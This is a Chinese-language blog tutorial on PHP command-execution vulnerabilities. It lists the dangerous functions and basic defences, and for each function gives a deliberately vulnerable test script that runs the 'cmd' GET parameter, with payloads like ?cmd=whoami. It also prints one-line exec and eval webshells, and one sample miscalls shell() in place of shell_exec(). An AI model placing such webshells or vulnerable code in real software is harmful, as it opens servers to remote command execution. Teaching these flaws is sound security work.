php命令执行漏洞基础以及常用函数

最新推荐文章于 2023-04-24 15:44:46 发布
最新推荐文章于 2023-04-24 15:44:46 发布
阅读量525 收藏 2
点赞数
分类专栏: # 命令执行漏洞 文章标签: web安全 安全 php 命令执行 渗透测试 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/129159483
版权

漏洞的产生原因

  • 代码层过滤不严。应用程序直接或间接使用了动态执行命令的危险函数,并且这个函数的运行参数是可控的

  • 系统的漏洞造成命令注入

漏洞的本质

  • 应用有时需要调用一些执行系统命令的函数,当服务器没有严格过滤用户提供的参数时,就有可能导致用户提交恶意代码被服务器执行,从而造成命令执行漏洞。

涉及到的函数

  • 1.system

  • 2.exec()

  • 3.shell_exec()

  • 4.passthru()

  • 5.popen()

  • 6.反引号

命令执行漏洞的危害

  • 1.继承Web 服务器程序权限(Web用户权限),去执行系统命令

  • 2.继承Web服务器权限,读写文件

  • 3.反弹Shell

  • 4.控制整个网站

  • 5.控制整个服务器

命令执行漏洞的防御

  • 1、尽量少使用执行命令函数或者禁用disable_functions

  • 2、在进入执行命令的函数之前,对参数进行过滤,对敏感字符进行转义

  • 3、参数值尽量使用引号包括,并在拼接前调用addslashes进行转义

命令执行相关函数的使用

system()

  • 说明:能够将字符串作为OS命令执行,自带输出功能

  • 测试参考代码:

<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>
payload:?cmd=ipconfig

exec()

  • 说明:能将字符串作为OS命令执行,但无输出需要输出执行结果print

  • exec() 默认只输出最后一行的数据

  • 如果想让他输出全部结果,可以加一个参数,即exec(ifconfig,$arr); print_r($arr);,如一句话木马:<?php exec($_REQUEST[123],$arr);print_r($arr)?>

  • 测试参考代码:

<?php
if(isset($_GET['cmd'])){
    print exec($_GET['cmd']);
}
?>
payload:?cmd=whoami

shell_exec()

  • 说明:执行命令并以字符串的形式,返回完整的信息,但是函数无回显需要输出执行结果

  • 测试参考代码

<?php
if(isset($_GET['cmd'])){
    print shell($_GET['cmd']);
}
?>
payload:?cmd=whoami

passthru()

  • 说明:执行外部命令,与system()类似,但是该函数会直接将结果输出,无需输出执行。

  • 测试参考代码:

<?php

if(isset($_GET['cmd'])){
    passthru($_GET['cmd']);
}
?>
payload:?cmd=whoami

popen()

  • 说明:能够执行OS命令,但是该函数并不是返回命令结果,而是返回一个文件指针

  • 测试参考代码:

<?php
if(isset($_GET['cmd'])){
    $cmd=$_GET['cmd'].">>1.txt";
    popen($cmd,'r');
}
?>
payload:?cmd=whoami

`` 反引号

  • 说明:反引号[``]内的字符串,也会被解析成OS命令

  • 反引号背后执行的代码其实是调用了shell_exec(),所以禁用了shell_exec()同样反引号也无法使用了。

  • 测试参考代码:

<?php
if(isset($_GET['cmd'])){
    $cmd=$_GET['cmd'];
    print `$cmd`;
}
?>
payload:?cmd=whoami

Thunderclap_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php执行系统命令的方法
12-19
PHP提供了几个函数来实现这个功能,最常用的是`exec()`、`system()`和`shell_exec()`。本文主要关注`exec()`函数,它是执行外部程序并获取输出的首选方法。 `exec()`函数的基本语法是: ```php exec($command, &$...
ctfshow web入门命令执行29~51
m0_61448651的博客
01-13 1872
ctfshow web入门命令执行29~51
命令执行漏洞及防御
GSflyy的博客
07-20 3226
“我这样自由的风,竟也会为你停留”
命令执行绕过技巧
菜鸟-传奇
01-21 2070
命令执行绕过技巧 参考:https://blog.csdn.net/weixin_39190897/article/details/116247765 参考:https://blog.csdn.net/solitudi/article/details/109837640 正则过滤 参考:https://www.runoob.com/php/php-preg_match.html 参考:https...
命令执行漏洞
qq_48904485的博客
03-21 1971
一、命令执行介绍 1、命令执行漏洞原理 命令执行漏洞定义:Web应用程序接收用户输入,拼接到要执行的系统命令执行。 产生原因: 1、用户输入未过滤或净化; 2、拼接到系统命令执行。 2、PHP命令执行函数PHP中具有执行系统命令功能的函数如下: 1、system 2、exec 3、shell_exec 4、passthru 5、popen 6、proc_popen 7、`反引号 8、ob_start 9、mail函数+LD_PRELOAD执行系统命令 使用示例: L
命令执行
jie_a的博客
05-09 404
命令执行文件包含源码1.代码执行如果过滤system如过滤点单引号 和 点过滤了分号 和 括号过滤了include过滤了数字过滤了很多符号利用函数echo print isset unset include requireprint函数变了源代码eval变成include过滤了flag过滤了PHP强制加后缀PHP 并且不回显include变成system需要url编码提交过滤了分号过滤了cat.flag过滤了空格过滤了所有空格过滤了<>函数变成可利用函数 文件包含 源码 if(isset($_G
第三节 Linux命令执行漏洞利用技巧-01
最新发布
09-15
"Linux命令执行漏洞利用技巧" Linux 命令执行漏洞利用技巧是一种常见Web 应用安全漏洞,攻击者可以通过构造恶意输入来执行系统命令,从而控制服务器。下面将详细介绍 Linux 命令执行漏洞利用技巧。 命令执行...
PHP突破disable_functions常用姿势以及使用Fuzz挖掘含内部系统调用的函数1
08-03
攻击者可以通过创建一个恶意的动态链接库(`.so`文件),并利用`LD_PRELOAD`将其加载到目标程序中,以覆盖如`system`、`exec`等函数,达到执行任意命令的目的。例如,创建一个包含`geteuid`系统调用的恶意`bad.so`库...
php常用代码
05-14
- `or die()`: 如果连接失败,则通过`die()`函数显示错误消息并终止脚本执行。 2. **`mysql_select_db`**: 选择需要使用的数据库。 - `"liuyanben"`: 指定数据库名称。 - `$connec`: 在`mysql_connect`函数中...
命令注入讲解ppt.pptx
08-10
命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞命令注入攻击最初被关注到,是 Shell 命令注入攻击(所以最初也被称为 Shell 命令注入攻击),由挪威一名程序员...
命令执行各种姿势总结
weixin_48427966的博客
04-24 976
一、绕过if(!eval($c);web30。
命令执行攻击与防御
weixin_45200712的博客
11-10 1920
命令执行攻击与防御原因危害系统命令执行漏洞远程命令执行漏洞利用系统函数实现远程命令执行利用动态函数执行利用漏洞获取webshell有效的防护方案管道命令拓展 原因 目标站点在设计时其过滤功能不严格或数据与代码区分不明显 危害 ①继承web服务程序权限去执行系统命令或读写文件 ②反弹shell ③控制整个网站甚至控制服务器 ④进一步内网渗透 系统命令执行漏洞 系统命令执行指的是利用系统自身的命令实现额外的命令执行。系统命令执行函数有system()、exec()、shell_exec()、passthr
命令执行漏洞综合
XXX26的博客
08-11 1153
命令执行漏洞 本次实验均在linux下测试: 1、命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 2、命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 3、更常见命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 可能存在漏洞函数:system、exec、shell_exec、passthru、popen、proc_popen等 一.命
基础知识点|命令执行漏洞相关总结
weixin_42282189的博客
11-10 8223
作者: h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 命令执行漏洞是指攻击者可以随意执行系统命令。它属于高危漏洞之一,也属于代码执行的范畴。命令执行漏洞不仅仅存在于B/S架构中,在C/S架构中也常常遇到。 简单的说,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许使用者通过改变$PATH或程序执行环境的其他方面来执行一个恶意构造的代码。 0x01 原理 命令执行漏洞是指应用有时.
php代码命令执行漏洞-常见危险函数
qq_41272376的博客
02-16 4901
php代码/命令执行漏洞-常见危险函数 php代码执行相关 eval() mixed eval ( string $code ) 把字符串code作为php代码执行常见的一句话木马: <?php eval($_GET['pass']) ?> 访问: http://xxx/codeexec.php?pass=phpinfo(); 得到phpinfo()页面。 assert() PHP 5 bool assert ( mixed $assertion [, string $desc
命令执行漏洞详解
xcxhzjl的博客
11-18 1382
目录 一、命令执行漏洞原理 二、利用方法 1、常用函数PHP中) 2、管道连接命令 三、防御 一、命令执行漏洞原理 命令执行漏洞是指攻击者可以执行任意系统命令,是代码执行的一种。 命令执行漏洞不仅可以存在B/S架构中,在C/S架构中也很常见。 二、利用方法 1、常用函数PHP中) ●shell_exec():执行shell命令并返回输出结果的字符串 ●eval():把字符串当作PHP代码来执行 ●preg_replace():正则表达式的搜索和替换 ●system():执行
PHP代码执行漏洞总结大全
热门推荐
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
PHP命令执行漏洞基础
笑花大王
02-02 2047
前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。 基本函数 1.system()用于执行外部程序,并且显示输出 <?php system('whoami'); ?> 2.exec()函数用于执行一个...
深度探索:PHP应用程序漏洞审计新视角
6. `preg_replace()`:正则替换函数,当使用`e`修饰符时,可能导致代码执行漏洞。 随着自动化工具和专业安全团队的发展,大公司产品的安全性有所提升,明显漏洞减少,但安全工作不能止步于此。我们需要探索新的审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值